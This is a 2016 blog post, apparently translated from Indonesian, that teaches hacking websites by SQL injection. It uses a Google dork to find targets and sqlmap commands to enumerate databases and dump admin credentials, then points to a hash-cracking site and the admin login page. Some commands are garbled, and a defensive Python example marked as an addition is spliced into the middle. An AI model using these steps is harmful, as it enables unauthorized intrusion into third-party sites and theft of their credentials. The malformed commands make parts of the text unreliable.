Tuesday, 5 January 2016


Assalamualaikum Wr Wb

Welcome back to HardGhost Security. This time the admin will share about hacking a web server.

The hacking method is SQL injection. Did you know? 70% of the sites in the world are hacked with the SQL injection method,
so this method is very widely used by hackers.
SQL injection works by exploiting syntax errors on the database server,
by inputting queries that display the contents of the target's database.
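
The defensive counterpart to the mechanism described above, as an added example that is not part of the original post: a product lookup by `id` written first with string concatenation, then with input validation and a bound parameter. The table name, sample rows and function names are assumptions constructed for the illustration, and SQLite stands in for the site's database.

```python
import re
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO product VALUES (77, 'keyboard'), (78, 'mouse');
        """
    )
    return db


def get_product_vulnerable(db, raw_id):
    # Vulnerable: the request value is pasted into the SQL text, so the
    # database parses whatever the client sent as part of the query.
    sql = "SELECT id, name FROM product WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def get_product_safe(db, raw_id):
    # Layer 1: the id must be a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # Layer 2: bind the value as a parameter; it is sent as data and can
    # never alter the structure of the statement.
    sql = "SELECT id, name FROM product WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("77", "77 OR 1=1"):  # constructed request values
        print(repr(value), "vulnerable:", get_product_vulnerable(db, value))
        print(repr(value), "safe:      ", get_product_safe(db, value))
```

With the concatenated query the second value rewrites the `WHERE` clause and every row comes back; the hardened handler returns nothing for it.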

Okay, on to the steps:

Dork:
inurl : product.php?id=
or the dork can be developed further

1. Open a terminal and type the command:
 sqlmap -u urltarget.com/product.php?id=77 --dbs

2. If a prompt appears, just press Y.

3. Wait until it finishes. If info appears in bright green text, it has probably succeeded in
breaking into the database; conversely, if many red/yellow messages appear, it has probably failed.

4. If the message GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] appears,
just choose N to speed things up.

5. Wait again, because the databases are being fetched. When it finishes, the database has been penetrated :D

6. Type in the terminal:
sqlmap -u target/php.?id=4 -d nama database --tables

7. Wait a moment and voilà, the tables are found :D

8. Look for a table related to admin. Because the site I used has no admin table, sorry, there are no screenshots from here on. Type:
 sqlmap -u target.com/php.id?=4 -d nama database -t tabel --columns

9. Once the column search is finished, continue with:
sqlmap -u target/php.?id=4 -d nama database -t admin --dump

10. And the admin information has been found :D If the password column contains a strange-looking password, for example
5cd66cb6efx6g6nd6 or similar, go to hashkiller.co.uk to see the original password.

11. After that, find the admin login page (y)

Okay, you can do it now, right? If the site is not vulnerable, just search again using the dork above,
or watch my video here:

That is all I can share. Hope it is useful :)

Offensive Say "Try Harder".

Wassalamualaikum Wr Wb

Author: Hardian Alkori

